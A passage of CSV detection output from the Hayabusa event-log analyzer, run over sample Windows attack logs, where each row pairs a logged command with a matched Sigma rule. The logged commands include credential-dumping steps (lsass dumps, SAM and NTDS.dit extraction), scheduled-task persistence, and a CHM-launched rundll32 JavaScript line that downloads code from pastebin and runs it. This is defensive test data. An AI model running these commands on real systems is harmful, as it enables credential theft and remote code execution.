powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.828 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task 
Management : Command: SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10 : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:46.927 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:47.218 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:47.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe -a -c : Path: C:\Windows\System32\pcalua.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 
23:57:50.398 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:50.453 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe -a Java : Path: C:\Windows\System32\pcalua.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:52.923 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:52.982 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl : Path: C:\Windows\System32\pcalua.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:53.882 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:54.099 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:54.129 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe : Path: C:\Windows\System32\forfiles.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:55.069 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe : Path: C:\Windows\System32\cmd.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:55.138 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: forfiles /p c:\windows\system32 /m notepad.exe /c c:\folder\normal.dll:evil.exe : Path: C:\Windows\System32\forfiles.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:55.236 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:57:58.359 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:09:40.973 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 4516 288 0000023C0CA1FA70 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:09:43.329 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /user : Path: C:\Windows\System32\whoami.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:08.184 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:16.487 
+09:00,MSEDGEWIN10,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:16.986 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""gsecdump -a"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:17.027 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:17.107 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wce -o output.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:17.149 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:17.224 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:17.243 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\sam sam : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:21.090 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:21.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\system system : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:23.317 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security"" : Path: C:\Windows\System32\cmd.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:23.336 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\security security : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Suspicious Use of Procdump on LSASS,,rules/sigma/process_creation/win_susp_procdump_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Renamed ProcDump,,rules/sigma/process_creation/win_renamed_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,LSASS Memory 
Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,Suspicious Use of Procdump,,rules/sigma/process_creation/win_susp_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,low,Usage of Sysinternals Tools,,rules/sigma/process_creation/process_creation_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,medium,Procdump Usage,,rules/sigma/process_creation/win_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.686 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.852 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""ntdsutil “ac i ntds” “ifm” “create full C:\Atomic_Red_Team q q"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.884 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.971 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: vssadmin.exe create shadow /for=C: : Path: C:\Windows\System32\vssadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,medium,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:27.082 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,high,Copying Sensitive Files with Credential Data,,rules/sigma/process_creation/win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,high,Copying Sensitive Files with Credential Data,,rules/sigma/process_creation/win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:27.233 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:27.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\SYSTEM 
C:\Extract\SYSTEM_HIVE : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:50.764 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:12:05.755 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\NOTEPAD.EXE"" C:\AtomicRedTeam\atomics\T1003\T1003.md : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm : Path: C:\Windows\hh.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx -2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,high,HH.exe Execution,,rules/sigma/process_creation/win_hh_chm.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx -2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c copy 
/Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe > nul && %%TEMP%%\out.exe javascript:""\..\mshtml RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WinHttp.WinHttpRequest.5.1"");h.Open(""GET"",""http://pastebin.com/raw/y2CjnRtH"",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im out.exe"",0,true);} : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx -2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,high,HTML Help Shell Spawn,,rules/sigma/process_creation/win_html_help_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx -2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx -2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\UACBypass.exe"" : Path: 